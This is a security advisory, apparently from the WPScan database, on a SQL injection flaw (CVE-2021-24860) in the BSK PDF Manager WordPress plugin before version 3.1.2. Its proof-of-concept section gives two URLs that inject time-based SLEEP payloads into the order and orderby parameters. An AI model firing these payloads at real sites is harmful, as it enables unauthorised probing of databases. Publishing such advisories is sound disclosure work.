WordPress Plugin Vulnerabilities

BSK PDF Manager < 3.1.2 - Admin+ SQL Injection

Description

The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue

Proof of Concept

With at least one BSK PDF Category:

https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order=and+sleep(5)
https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby=last_date`+AND+SLEEP(5)+OR+`last_date

Affects Plugins

bsk-pdf-manager

Fixed in version 3.1.2

References

CVE

CVE-2021-24860

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

JrXnm

Submitter

JrXnm

Submitter website

https://blog.szfszf.top

Verified

Yes

WPVDB ID

d5891973-37d0-48cb-a5a3-a26c771b3369

Timeline

Publicly Published

2021-11-01 (about 10 months ago)

Added

2021-11-01 (about 10 months ago)

Last Updated

2022-04-13 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin